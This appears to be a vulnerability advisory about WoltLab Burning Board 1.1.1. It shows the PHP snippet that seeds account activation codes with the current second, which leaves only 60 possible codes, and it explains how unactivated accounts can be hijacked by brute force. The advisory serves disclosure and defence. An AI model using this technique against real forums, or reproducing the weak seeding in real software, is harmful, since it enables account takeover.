Title: WoltLab Burning Board Predictable Account Activation String Vulnerability
Severity: MODERATE
Description:
WoltLab Burning Board is a free web-based bulletin board package based on PHP and MySQL.
It is possible to hijack an account that has not yet been activated. When a user creates a new account on a Burning Board forum, they will be presented with a link which they must click in order to activate their account:
http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322
The code variable is generated by the following operation:
$datum = date("s");
mt_srand($datum);
$z = mt_rand();
Since the variable is generated by performing an mt_srand operation on the second that the request is submitted, there are only 60 possible values for this variable. An attacker could easily perform a brute force attack on this variable and gain access to the user's account.
Affected Products:
- Woltlab Burning Board 1.1.1
References:
- CityForFree: CityForFree Product Page
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
